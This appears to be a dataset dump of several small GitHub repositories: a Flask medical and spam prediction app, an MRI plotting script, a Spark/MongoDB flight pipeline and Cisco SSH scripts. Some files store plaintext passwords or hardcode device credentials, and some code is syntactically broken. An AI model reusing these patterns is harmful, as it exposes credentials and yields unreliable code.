f:\n reader = csv.reader(f, delimiter=';')\n for row in reader:\n p = row[0]\n p1, p2 = p.split(',') #p1 is path, # p2 is lable\n print(p1)\n img_path = '/Users/sharmarochan/Desktop/extracted files/augumented_image/Barking_deer_agu_0_0_0.jpg'\n\n img = image.load_img(img_path, target_size=(256, 256))\n imshow(img)\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n print (x.shape)\n\n break\n\nextract_pixels_from_jpg()\n\n\n\ndef dataaugumentation():\n\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", category = FutureWarning)\n\n datagen = ImageDataGenerator(featurewise_center=True, featurewise_std_normalization=True, rotation_range=20, width_shift_range=0.2, height_shift_range=0.2, horizontal_flip=True)\n image_per = 0\n\n\n for item in dirs_array_sort:\n\n if not item.startswith('.') and item != 'Thumbs.db':\n\n image_per = image_per + 1\n print(\"image: \", image_per)\n\n par1, par2 = item.rsplit('_', 1)\n\n im = load_img(path + item)\n x = img_to_array(im)\n x = x.reshape((1,) + x.shape)\n i = 0\n\n for batch in datagen.flow(x, batch_size=1, save_to_dir='augumented_image', save_prefix=par1 + '_agu_' + str(i), save_format='jpg'):\n i += 1\n if i > 15:\n break\n\n# dataaugumentation()\n\n\n\n# def createModel():\n" } ]
1
Surat-96/E2E_Diabetes_Spamham
https://github.com/Surat-96/E2E_Diabetes_Spamham
0ee07c55b6e26e3d46635d0fd745747e7597f9ba
e00221f52c9d72d417f6113f7f1b634b783af04f
227403667e7c31da538758c3fb342dd45efe54ca
refs/heads/master
2023-07-09T21:25:09.838655
2021-08-21T11:35:23
2021-08-21T11:35:23
279,217,875
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5820433497428894, "alphanum_fraction": 0.6408668756484985, "avg_line_length": 22.071428298950195, "blob_id": "f90c1a4a332a7355b2d06ad8a56ead1cea1e6c06", "content_id": "043268e8069ea06f8c0e6b38c5666bead2f9cba2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1615, "license_type": "no_license", "max_line_length": 76, "num_lines": 70, "path": "/DB/py_accounts.sql", "repo_name": "Surat-96/E2E_Diabetes_Spamham", "src_encoding": "UTF-8", "text": "-- phpMyAdmin SQL Dump\n-- version 4.7.4\n-- https://www.phpmyadmin.net/\n--\n-- Host: 127.0.0.1\n-- Generation Time: Jul 01, 2020 at 09:08 AM\n-- Server version: 10.1.29-MariaDB\n-- PHP Version: 7.2.0\n\nSET SQL_MODE = \"NO_AUTO_VALUE_ON_ZERO\";\nSET AUTOCOMMIT = 0;\nSTART TRANSACTION;\nSET time_zone = \"+00:00\";\n\n\n/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;\n/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;\n/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;\n/*!40101 SET NAMES utf8mb4 */;\n\n--\n-- Database: `py_accounts`\n--\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `accounts`\n--\n\nCREATE TABLE `accounts` (\n `id` int(100) NOT NULL,\n `username` varchar(100) NOT NULL,\n `age` int(100) NOT NULL,\n `email` varchar(100) NOT NULL,\n `password` varchar(100) NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=latin1;\n\n--\n-- Dumping data for table `accounts`\n--\n\nINSERT INTO `accounts` (`id`, `username`, `age`, `email`, `password`) VALUES\n(1, 'Surat Banerjee', 24, '[email protected]', 'surat'),\n(2, 'Moumita Banerjee', 30, '[email protected]', 'moumita');\n\n--\n-- Indexes for dumped tables\n--\n\n--\n-- Indexes for table `accounts`\n--\nALTER TABLE `accounts`\n ADD PRIMARY KEY (`id`);\n\n--\n-- AUTO_INCREMENT for dumped tables\n--\n\n--\n-- AUTO_INCREMENT for table `accounts`\n--\nALTER TABLE `accounts`\n MODIFY `id` int(100) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;\nCOMMIT;\n\n/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n" }, { "alpha_fraction": 0.6427457332611084, "alphanum_fraction": 0.6437857747077942, "avg_line_length": 28.136363983154297, "blob_id": "210cf8e10f38c7db415ffb5ff4a0c4396834fd7f", "content_id": "494a6091ad7063a6881e87bbdb2c645058e49b03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1923, "license_type": "no_license", "max_line_length": 105, "num_lines": 66, "path": "/app.py", "repo_name": "Surat-96/E2E_Diabetes_Spamham", "src_encoding": "UTF-8", "text": "from flask import Flask,render_template,redirect,url_for,request\nimport pickle\nimport numpy as np\n\nfrom flask_mysqldb import MySQL\nimport MySQLdb.cursors\nimport re\n\n\napp = Flask(__name__, static_folder='static', template_folder='templates')\n\n#diabetes model read\nfilename = open('Diabetes/diabetespredictmodel.pkl', 'rb')\nmodel = pickle.load(filename)\nfilename.close()\n\n#spamham model read\nfilename = open('Spam_Ham/spam-sms-mnb-model.pkl', 'rb')\nclassifier = pickle.load(filename)\nfiles = open('Spam_Ham/cv-transform.pkl','rb')\ncv = pickle.load(files)\nfilename.close()\nfiles.close()\n\n\[email protected]('/')\ndef index():\n\treturn render_template('home.html')\n\[email protected]('/home')\ndef home():\n\treturn render_template('home.html')\n \[email protected]('/diapredict', methods=['GET','POST'])\ndef diapredict():\n if request.method == 'POST':\n na = request.form['na']\n pr = int(request.form['pr'])\n gl = int(request.form['gl'])\n bp = int(request.form['bp'])\n st = int(request.form['st'])\n ins = int(request.form['in'])\n bm = float(request.form['bm'])\n dp = float(request.form['dp'])\n ag = int(request.form['ag'])\n \n data = np.array([[pr,gl,bp,st,ins,bm,dp,ag]])\n my_prediction = model.predict(data)\n my_prediction_proba = model.predict_proba(data)[0][1]\n \n return render_template('diashow.html',name=na,prediction=my_prediction,proba=my_prediction_proba)\n return render_template('dia.html')\n\[email protected]('/sphampredict',methods=['GET','POST'])\ndef sphampredict():\n if request.method == 'POST':\n message = request.form['message']\n data = [message]\n vect = cv.transform(data).toarray()\n my_prediction = classifier.predict(vect)\n return render_template('sphamshow.html', prediction=my_prediction)\n return render_template('spham.html')\n\n \nif __name__ == '__main__':\n\tapp.run(debug=True)\n" }, { "alpha_fraction": 0.7628205418586731, "alphanum_fraction": 0.7820512652397156, "avg_line_length": 50.66666793823242, "blob_id": "ba603a7b350be64908533e927a16b40b92131f6e", "content_id": "93d2168d9d027f14c8287f524c43afce379aeec3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 157, "license_type": "no_license", "max_line_length": 88, "num_lines": 3, "path": "/README.md", "repo_name": "Surat-96/E2E_Diabetes_Spamham", "src_encoding": "UTF-8", "text": "# E2E_Diabetes_Spamham\nIt is an End 2 End ML Project with Machine\nLearning Algorithm (Random Forest, Naïve Bayes), Flask by Self Implement within 1 month.\n\n" } ]
3
vch338/MRI-plots
https://github.com/vch338/MRI-plots
d26558fca971dfef48d0538188b2cf7a3469e3ff
9de2a9d7153ab5f3dce3a4d920c0125309910206
679d3eb1a54ff1eadfa68a7f32de5e34c2060239
refs/heads/master
2021-01-23T05:18:44.513422
2017-06-28T15:00:48
2017-06-28T15:00:48
92,965,333
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 11, "blob_id": "cd8ff0ea852a9e3a17e4d55bca860696831f337c", "content_id": "c9183409e55f8e2e500331daaa7720dfbc5fc3a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 12, "license_type": "no_license", "max_line_length": 11, "num_lines": 1, "path": "/README.md", "repo_name": "vch338/MRI-plots", "src_encoding": "UTF-8", "text": "# MRI-plots\n" }, { "alpha_fraction": 0.4767351746559143, "alphanum_fraction": 0.4939899146556854, "avg_line_length": 29.696428298950195, "blob_id": "7b46c10e63f7006ba0e8634088dd8f81d8aa6588", "content_id": "54f02462cbd992e704aba9cffb9a61df264c7325", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10316, "license_type": "no_license", "max_line_length": 164, "num_lines": 336, "path": "/polar-mri.py", "repo_name": "vch338/MRI-plots", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# default colors:\ndflt_color_norm = 'grey'\ndflt_color_dev = '#2E6DA4' # bluish\ngroups = \\\n[\n {\n 'color_dev': '#2E6DA4', # bluish\n 'Cortex' :\n [\n {\n 'Frontal': [ 'Frontallobevolume' ],\n },\n {\n 'Cingulate': [ 'Cingulatevolume' ],\n },\n {\n 'Temporal': [ 'Temporallobevolume' ],\n },\n {\n 'Insula': [ 'Insulavolume' ],\n },\n {\n 'Parietal': [ 'Parietallobevolume' ],\n }, \n {\n 'Occipital': [ 'Occipitallobevolume' ],\n },\n\t ],\n },\n {\n 'color_dev': '#5cb85c', # greenish\n 'White matter':\n [ \n {\n 'Frontal': [ {'RightFrontalWhiteMatter':'R'}, {'LeftFrontalWhiteMatter':'L'} ],\n\n # Override default group color for each subgroup like this:\n # 'color_dev': '#5cb85c', # greenish\n # 'color_norm': '#5cb85c', # greenish\n },\n {\n 'Cingulate': [ {'RightCingulateWhiteMatter':'R'}, {'LeftCingulateWhiteMatter':'L'} ],\n },\n {\n 'Corpus\\nCallosum': [ 'CorpusCallosum' ], \n },\n {\n 'Temporal': [ {'RightTemporalWhiteMatte':'R'}, {'LeftTemporalWhiteMatte':'L'} ],\n },\n { \n 'Insula': [ {'RightInsulaWhiteMatter':'R'}, {'LeftInsulaWhiteMatter':'L'} ],\n },\n {\n 'Parietal': [ {'RightParietalWhiteMatter':'R'}, {'LeftParietalWhiteMatter':'L'} ],\n },\n {\n 'Occipital': [ {'RightOccipitalWhiteMatter':'R'}, {'LeftOccipitalWhiteMatter':'L'} ],\n },\n ],\n },\n {\n 'color_dev': '#f0ad4e', # orangy\n 'Subcortical Regions' :\n [\n {\n 'Caudate': [ {'RightCaudate':'R'}, {'LeftCaudate':'L'} ],\n },\n {\n 'Accumbens': [ {'RightAccumbensArea':'R'}, {'LeftAccumbensArea':'L'} ],\n },\n { \n 'Putamen': [ {'RightPutame':'R'}, {'LeftPutame':'L'} ],\n },\n {\n 'Pallidum': [ {'RightPallidum':'R'}, {'LeftPallidum':'L'} ],\n },\n { \n 'Basal\\nForebrain': [ {'Right Basal Forebrain':'R'}, {'Left Basal Forebrain':'L'} ],\n },\n {\n 'Amygdala': [ {'RightAmygdala':'R'}, {'LeftAmygdala':'L'} ],\n },\n {\n 'Hippocampus': [ {'RightHippocampus':'R'}, {'LeftHippocampus':'L'} ],\n },\n {\n 'Ventral DC': [ {'Right Ventral DC':'R'}, {'Left Ventral DC':'L'} ],\n },\n {\n 'Thalamus': [ {'RightThalamusProper':'R'}, {'LeftThalamusProper':'L'} ],\n },\n {\n 'Brain Stem': [ 'BrainStem' ],\n },\n {\n 'Pons': [ 'Pons' ],\n },\n ],\n },\n {\n 'color_dev': '#d9534f', # redish\n 'Cerebellum':\n [\n {\n 'Anterior': [ 'Anterior' ],\n },\n {\n 'Superior Posterior': [ 'Superior_Posterior' ],\n },\n {\n 'Posterior': [ 'Posterior' ],\n },\n {\n 'Inferior Posterior': [ 'Inferior_Posterior' ],\n },\n {\n 'Vermis': [ 'Vermis' ],\n },\n {\n 'Deep nuclei': [ 'Deep_nuclei' ],\n },\n ],\n },\n]\n\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport itertools\nimport csv,sys\nimport numpy as np\ncsv.register_dialect('tab', delimiter='\\t', quoting=csv.QUOTE_NONE)\n\ndef usage():\n print 'Usage: polar-mri.py [OPTIONS] <in.txt> <out.png|pdf|svgz>'\n print 'Options:'\n print ' -a, --abs-dev Preserve sign of the deviation'\n print ' -c, --config <file> Config file'\n print ' -d, --deviation <num> Highlight deviations bigger than this [0.05]'\n print ' -h, --help This help message'\n sys.exit(1)\n\ndef usage_example():\n print \"\\nExample of valid input:\"\n print \"\\tRightAccumbensArea LeftAccumbensArea RightAmygdala etc..\"\n print \"\\t0.5% 2.9% 33.1% etc..\\n\"\n\n\nabs_dev = False\nin_file = None\nout_file = None\nconfig = None\ndev = 0.05\nif len(sys.argv) < 2: usage()\nargs = sys.argv[1:]\nwhile len(args):\n if args[0]=='-a' or args[0]=='--abs-dev': \n abs_dev = True\n elif args[0]=='-?' or args[0]=='-h' or args[0]=='--help': \n usage()\n elif args[0]=='-c' or args[0]=='--config': \n args = args[1:]\n config = args[0]\n elif args[0]=='-d' or args[0]=='--deviation': \n args = args[1:]\n dev = float(args[0])\n elif in_file == None: in_file = args[0]\n elif out_file == None: out_file = args[0]\n else: usage()\n args = args[1:]\n\nif config!=None: execfile(config)\nlines = open(in_file, 'rb').readlines()\n\nif len(lines) != 2: \n print \"Error: expected two lines on input, got: \",len(lines)\n usage_example()\n sys.exit(1)\n\nall_cols = lines[0].split('\\t')\nall_vals = lines[1].split('\\t')\n\nif len(all_cols) != len(all_vals): \n print \"Error: different number of fields in the two lines: \",len(all_cols),\" vs \",len(all_vals)\n usage_example()\n sys.exit(1)\n\ncols_hash = {}\nfor i in range(len(all_cols)):\n key = all_cols[i].strip()\n val = all_vals[i].strip().rstrip('%')\n try:\n val = float(val)/100.\n except:\n pass\n continue\n if abs_dev: val += 1\n else: val = 1 - abs(val)\n cols_hash[key] = val\n\nltmp = [] # labels, can repeat multiple times\nlbls = []\nxlbls = []\nlbls2 = []\nxvals = []\nyvals = []\ncols = []\nsgrp = []\nfor hash in groups:\n color_dev = dflt_color_dev\n color_norm = dflt_color_norm\n if 'color_dev' in hash: color_dev = hash['color_dev']\n if 'color_norm' in hash: color_norm = hash['color_norm']\n for grp in hash:\n if grp=='color_dev': continue\n if grp=='color_norm': continue\n for shash in hash[grp]:\n for key in shash:\n for column in shash[key]:\n lbl2 = None\n if type(column).__name__ == 'dict':\n for cname in column:\n #if key=='Thalamus' or key=='Parietal' or key=='Pallidum' or key=='Putame': lbl2 = column[cname]\n lbl2 = column[cname]\n column = cname\n break\n if column not in cols_hash: continue\n lbls2.append(lbl2)\n ltmp.append(key)\n yvals.append(cols_hash[column])\n sgrp.append(grp)\n color = []\n if 'color_dev' in shash: color.append(shash['color_dev'])\n else: color.append(color_dev)\n if 'color_norm' in shash: color.append(shash['color_norm'])\n else: color.append(color_norm)\n cols.append(color)\n\nif len(yvals)==0: \n print \"No valid columns found!\"\n usage_example()\n sys.exit()\n\nwidth = 2*np.pi/len(yvals)\nfor i in range(len(yvals)):\n xvals.append(i*width)\nbeg = 0\nwhile beg<len(ltmp):\n lbl = ltmp[beg]\n end = beg\n while end<len(ltmp) and ltmp[end]==lbl: end += 1\n xval = (xvals[beg]+xvals[end-1]+width)*0.5\n xlbls.append(xval)\n lbls.append(lbl)\n if beg==end: beg = end + 1\n else: beg = end\n\n\nax = plt.subplot(111, projection='polar')\nbars = ax.bar(xvals, yvals, width=width, bottom=0.0)\n\nax.axes.get_xaxis().grid(False)\n#ax.grid(False)\nax.spines['polar'].set_visible(False) # do not draw axis border\nax.set_xticks([])\n#ax.set_rlabel_position(0)\nax.tick_params(axis='both', which='major', labelsize=9)\n\n# Highlight tick at 1?\n# for g,t,l in zip(ax.get_ygridlines(),ax.get_yticks(),ax.get_yticklabels()):\n# if t==1:\n# #l.set_color('#D43F3A')\n# g.set_color('#D43F3A')\n# g.set_linewidth(2)\n# g.set_linestyle(':')\n\nyticks = ax.get_yticks() # to get the distance of labels right\n\n# hide the outer grid circle and replace it with segments\nleg = {}\ng = ax.get_ygridlines()\ng[-1].set_linestyle('none')\nfor i in range(len(yvals)):\n beg = i*width\n end = (i+1)*width\n ax.plot(np.linspace(beg, end, 10), np.ones(10), color=cols[i][0], linestyle='-', linewidth=4)\n leg[cols[i][0]] = sgrp[i]\n\n# Legend\nleg_rect = []\nleg_lbl = []\nfor col in leg:\n rect = patches.Rectangle((0,0), 0.1, 0.1, color=col)\n leg_rect.append(rect)\n leg_lbl.append(leg[col])\nleg_rect.append(patches.Rectangle((0,0), 0.1, 0.1, color='grey', alpha=0.4))\nleg_lbl.append('Not statistically significant')\nplt.legend(leg_rect,leg_lbl,prop={'size':9},frameon=False,bbox_to_anchor=(0.98,0.98),bbox_transform=plt.gcf().transFigure)\n\n# Radial text labels\nfor i in range(len(xlbls)):\n angle_rad = xlbls[i]\n angle_deg = angle_rad*180/np.pi\n ha = \"left\"\n rot = angle_deg\n if angle_rad > np.pi/2 and angle_rad < np.pi*3/2.: \n ha = \"right\"\n rot = angle_deg - 180\n plt.text(angle_rad, yticks[-1]+0.05, lbls[i], size=9, horizontalalignment=ha, \n verticalalignment=\"center\", rotation=rot, rotation_mode='anchor')\n\n# L/R sub-labels\nfor i in range(len(lbls2)):\n if lbls2[i]==None: continue\n angle_rad = i*width+width*0.5\n angle_deg = angle_rad*180/np.pi - 90\n ha = \"left\"\n rot = angle_deg\n plt.text(angle_rad, yticks[-1]-0.08, lbls2[i], size=9, horizontalalignment=ha, verticalalignment=\"center\", rotation=rot, rotation_mode='anchor',color='#555555')\n\nfor x,y,color,bar in zip(xvals, yvals, cols, bars):\n if abs(y-1) > dev:\n bar.set_facecolor(color[0])\n bar.set_edgecolor(color[0])\n bar.set_alpha(0.7)\n else:\n bar.set_facecolor(color[1])\n bar.set_edgecolor(color[1])\n bar.set_alpha(0.4)\n\nplt.subplots_adjust(left=0.0,right=0.85,bottom=0.15,top=0.85)\nplt.savefig(out_file)\nplt.close()\n\n\n" } ]
2
dylanbking97/big-fun-data
https://github.com/dylanbking97/big-fun-data
b20b7d39521d87a3511e025fa13986fd8219eda3
88403bdc75934f5d051c27406538e1518f03596b
233ddb809a38c54a0697b8398978f478eca6c44d
refs/heads/master
2020-07-11T15:41:07.999605
2019-08-28T05:52:10
2019-08-28T05:52:10
204,587,068
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7068119645118713, "alphanum_fraction": 0.7079018950462341, "avg_line_length": 38.89130401611328, "blob_id": "0354b9ea1a4a098e1994ab66973e8e19f38f3035", "content_id": "3b8c9d8db4abe8ce8baaa8e940805dd4b623aba2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1835, "license_type": "no_license", "max_line_length": 111, "num_lines": 46, "path": "/controller.py", "repo_name": "dylanbking97/big-fun-data", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request\nfrom pymongo import MongoClient\nfrom bson import json_util\nimport setup\n\n# Set up Flask and Mongo\napp = Flask(__name__)\nclient = MongoClient()\n\[email protected](\"/on_time_performance\")\ndef on_time_performance():\n carrier = request.args.get('Carrier')\n flight_date = request.args.get('FlightDate')\n flight_num = request.args.get('FlightNum')\n flight = client.agile_data_science.on_time_performance.find_one({\n 'Carrier': carrier,\n 'FlightDate': flight_date,\n 'FlightNum': flight_num\n })\n \n return render_template('flight.html', flight=flight)\n\n# Controller: Fetch all flights between cities on a given day and display them\[email protected](\"/flights/<origin>/<dest>/<flight_date>\")\ndef list_flights(origin, dest, flight_date):\n \n flights = client.agile_data_science.on_time_performance.find({\n 'Origin': origin, 'Dest': dest, 'FlightDate': flight_date},\n sort = [('DepTime', 1),('ArrTime', 1)])\n \n flight_count = flights.count()\n return render_template('flights.html', flights=flights, flight_date=flight_date, flight_count=flight_count)\n\n# Fetch all flights made by a particular airplane, identified by its tail number\[email protected](\"/airplane/flights/<tail_number>\")\ndef flights_per_airplane(tail_number):\n flights = client.agile_data_science.flights_per_airplane.find_one({'TailNum': tail_number})\n return render_template('flights_per_airplane.html', flights=flights, tail_number=tail_number)\n\[email protected](\"/airline/<carrier_code>\")\ndef airline(carrier_code):\n airline_airplanes = client.agile_data_science.airplanes_per_carrier.find({'Carrier': carrier_code})\n return render_template('airlines.html',airline_airplanes=airline_airplanes,carrier_code=carrier_code)\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n" }, { "alpha_fraction": 0.7267851829528809, "alphanum_fraction": 0.7369461059570312, "avg_line_length": 54.34375, "blob_id": "4bc1075af16e544ba7d7df5d7d3b54f9684d2cfe", "content_id": "ad96ca903e5a14872e655b8ed9adfa3f393887be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3543, "license_type": "no_license", "max_line_length": 137, "num_lines": 64, "path": "/setup.py", "repo_name": "dylanbking97/big-fun-data", "src_encoding": "UTF-8", "text": "import pymongo\nimport pymongo_spark\n\non_time_dataframe = spark.read.format('com.databricks.spark.csv.options(header='true',treatEmptyValuesAsNulls='true',)/\n .load('data/On_Time_On_Time_Performance_2015.csv.bz2'))\n \non_time_dataframe.registerTempTable(\"on_time_performance\")\n\ntrimmed_cast_performance = spark.sql(\"\"\"SELECT Year, Quarter, Month, DayofMonth, DayOfWeek, FlightDate, Carrier, TailNum, FlightNum,\nOrigin, OriginCityName, OriginState, Dest, DestCityName, DestState, DepTime, cast(DepDelay as float), cast(DepDelayMinutes as int),\ncast(TaxiOut as float), cast(TaxiIn as float), WheelsOff, WheelsOn, ArrTime, cast(ArrDelay as float), cast(ArrDelayMinutes as float),\ncast(Cancelled as int), cast(Diverted as int), cast(ActualElapsedTime as float), cast(AirTime as float), cast(Flights as int), \ncast(Distance as float), cast(CarrierDelay as float), cast(WeatherDelay as float), cast(NASDelay as float), cast(SecurityDelay as float),\ncast(LateAircraftDelay as float), CRSDepTime, CRSArrTime FROM on_time_performance\"\"\") \n\n# Replace on_time_performance table with our new, trimmed table and show its columns\ntrimmed_cast_performance.registerTempTable(\"on_time_performance\")\n#trimmed_cast_performance.show()\n\n\ntrimmed_cast_performance.write.parquet(\"data/on_time_performance.parquet\")\non_time_dataframe = spark.read.parquet('data/on_time_performance.parquet') \n\n\npymongo_spark.activate()\n\n#convert each row to a dict\nas_dict = on_time_dataframe.rdd.map(lambda row: row.asDict())\n\n#This collection acts as a base table containing all information about the flights\nas_dict.saveToMongoDB('mongodb://localhost:27017/agile_data_science.on_time_performance')\n\n#Create an index that will speed up queries for getting all flights from one airport to another, on a given date\ndb.on_time_performance.ensureIndex({Origin: 1, Dest: 1, FlightDate: 1})\n\n\n#Create an airplane entity, identifiable by its tail number\n\n# Filter down to the fields we need to identify and link to a flight\nflights = on_time_dataframe.rdd.map(lambda x:(x.Carrier, x.FlightDate, x.FlightNum, x.Origin, x.Dest, x.TailNum))\n\nflights_per_airplane = flights.map(lambda nameTuple: (nameTuple[5], [nameTuple[0:5]]))\\\n.reduceByKey(lambda a, b: a + b)\\\n.map(lambda tuple:{'TailNum': tuple[0], 'Flights': sorted(tuple[1], key=lambda x: (x[1], x[2]))})\n\npymongo_spark.activate()\n\n#This table contains a basic flight history for each airplane\nflights_per_airplane.saveToMongoDB('mongodb://localhost:27017/agile_data_science.flights_per_airplane')\n\n#Create an index for the quickly fetching all of the flights for a given airplane (identified by tail number)\ndb.flights_per_airplane.ensureIndex({\"TailNum\": 1})\n\n\n# Get all unique tail numbers for each airline\non_time_dataframe.registerTempTable(\"on_time_performance\")\ncarrier_airplane = spark.sql(\"SELECT DISTINCT Carrier, TailNum FROM on_time_performance\")\n# Now we need to store a sorted list of tail numbers for each carrier, along with a fleet count\nairplanes_per_carrier = carrier_airplane.rdd.map(lambda nameTuple: (nameTuple[0], [nameTuple[1]]))\\\n.reduceByKey(lambda a, b: a + b).map(lambda tuple:\n {'Carrier': tuple[0],'TailNumbers': sorted(filter(lambda x: x != '', tuple[1])),'FleetCount': len(tuple[1])})\n\n#This collection contains the fleet of each airplane carrier\nairplanes_per_carrier.saveToMongoDB('mongodb://localhost:27017/agile_data_science.airplanes_per_carrier')\n\n" } ]
2
mcs618/NetProjects
https://github.com/mcs618/NetProjects
7cf7544c993e027f4e2084873b850729e88a75bd
db1b0799394b8d439b3b52249ea7e97b05d229a9
7021b3dd8ffc9580f6afbcfb184b05f8fbc31a04
refs/heads/master
2020-03-22T02:15:10.101338
2019-01-30T22:32:51
2019-01-30T22:32:51
139,359,187
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5541666746139526, "alphanum_fraction": 0.5769230723381042, "avg_line_length": 24.365854263305664, "blob_id": "6b40163a41b1c13aa4cc33cb603ae5716946c094", "content_id": "efa79e585cd763ba8f9765f6ee978c889e3fec45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3120, "license_type": "no_license", "max_line_length": 110, "num_lines": 123, "path": "/error_detect/error_detect_0.30d.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.30d\n# port error detector\n# mcs\n# 5/1/2017\n#\n# rows 0 - 8\n\nimport paramiko\nimport time\nimport re\n\nip_addr = '192.168.1.204'\nusername = 'admin'\npassword = 'mcs618'\n\nremote_conn_pre = paramiko.SSHClient()\nremote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nremote_conn_pre.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\nremote_conn = remote_conn_pre.invoke_shell()\nremote_conn.send(\"terminal length 0\" + \"\\n\")\nremote_conn.send(\"show ip int brief\" + \"\\n\")\ntime.sleep(1)\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nipbrieflist = mystring.splitlines()\nhostnamelist = ipbrieflist[1].split('>')\nhostname = hostnamelist[0]\nipbrieflen = int(len(ipbrieflist) - 5)\ndel ipbrieflist[:4]\ndel ipbrieflist[ipbrieflen]\nprint()\n\nipbriefRegex = re.compile(r'(\\S+)(.+)')\n\nipbriefintlist = []\nfor elem in ipbrieflist:\n mo = ipbriefRegex.search(elem)\n if (mo.group(1)).startswith('Loop') or (mo.group(1)).startswith('Vlan'):\n continue\n ipbriefintlist.append(mo.group(1))\n\nprint(\"*********\")\nprint(ipbriefintlist[0])\nprint(ipbriefintlist[1])\nprint(\"*********\")\nprint()\nprint(hostname)\n\nfor intf in ipbriefintlist:\n print(\"*****\")\n print(\"Interface \" + intf)\n remote_conn.send(\"show int \" + intf + \"\\n\")\n time.sleep(1)\n outp = remote_conn.recv(5000)\n shintstring = outp.decode(\"utf-8\")\n shintlist = shintstring.splitlines()\n \n if not shintlist[3].startswith(' Internet'):\n shintlen = int(len(shintlist) - 20)\n del shintlist[:19]\n del shintlist[shintlen]\n else:\n shintlen = int(len(shintlist) - 21)\n del shintlist[:20]\n del shintlist[shintlen]\n\n def striplist(errlist):\n return [item.strip() for item in errlist]\n\n errdict = {}\n for line in shintlist:\n errors_list = striplist(line.split(\",\"))\n\n errRegex = re.compile(r'(\\d+)(\\s)(\\D+)')\n\n for elem in errors_list:\n mo = errRegex.search(elem)\n errdict[mo.group(3)] = int(mo.group(1))\n\n if len(errdict) == 21:\n del errdict['packets output']\n del errdict['bytes']\n for k, v in errdict.items():\n print(k, v)\n\n print()\n\n # if counter = 19 and value = 0, continue\n \n # if len(errdict) == 21:\n # for k, v in errdict.items():\n # print(k, v)\n # print()\n \n # for elem in errors_list:\n # mo = errRegex.search(elem)\n # errdict[mo.group(3)] = int(mo.group(1))\n # if int(mo.group(1)) > 0:\n # print(\"There are errors\")\n # else:\n # print(\"There are no errors\")\n\n # print(errdict)\n \n # Model for how to bypass unwanted lines\n\nfile = ['beef', 'string1', 'veal', 'string2', 'pork', 'string3', 'chicken']\nstrings = (\n \"string1\",\n \"string2\",\n \"string3\"\n)\n\nfor item in file:\n if any(s in item for s in strings):\n print(\"yay!\")\n else:\n continue\n \n------------------------\n\nfor k, v in dict.items():\n\t print(k,v)\n" }, { "alpha_fraction": 0.48430493474006653, "alphanum_fraction": 0.5007473826408386, "avg_line_length": 29.409090042114258, "blob_id": "45fbfa113c8b52dbaa64db811d12ca035c623494", "content_id": "bf3498be6ac3587c95881e349c4eb7ac43c07593", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 669, "license_type": "no_license", "max_line_length": 81, "num_lines": 22, "path": "/Clients_per_AP/clients_per_ap.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "import re\nfrom collections import defaultdict\n\nclient_sum = \"d:\\\\python\\\\projects\\\\Clients_per_AP\\\\show_client_summary.txt\"\nper_AP = \"d:\\\\python\\\\projects\\\\Clients_per_AP\\\\Clients_per_AP.txt\"\n\nd = defaultdict(int)\n\nwith open(per_AP, 'w') as pap:\n with open(client_sum, 'r') as cs:\n for line in cs:\n regex = re.compile(r'([0-9a-f]{2}[:-]){5}([0-9a-f]{2})(\\s)(.+?)(\\s)')\n mo = regex.search(line)\n ap_name = mo.group(4)\n\n d[ap_name] += 1\n\n for k, v in d.items():\n if v > 5:\n print(k, \":\", v, \" <----- Client count greater than 5.\")\n else:\n print(k, \":\", v)\n" }, { "alpha_fraction": 0.5296052694320679, "alphanum_fraction": 0.5460526347160339, "avg_line_length": 28.419355392456055, "blob_id": "3f50aae61fe04352a44882afa58c4440b3f70788", "content_id": "4996f5a5bdfb815a4d86d622503571f477327d83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 912, "license_type": "no_license", "max_line_length": 81, "num_lines": 31, "path": "/migrate_APs/assign_to_AP-group.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "Text = \"d:\\\\python\\\\projects\\\\migrate_APs\\\\show_ap_summary.txt\"\nnewfile = \"d:\\\\python\\\\projects\\\\migrate_APs\\\\assign_to_AP_group.txt\"\n\nignore = ('(Cisco Controller)',\n 'Number of APs',\n 'Global AP username',\n 'Global 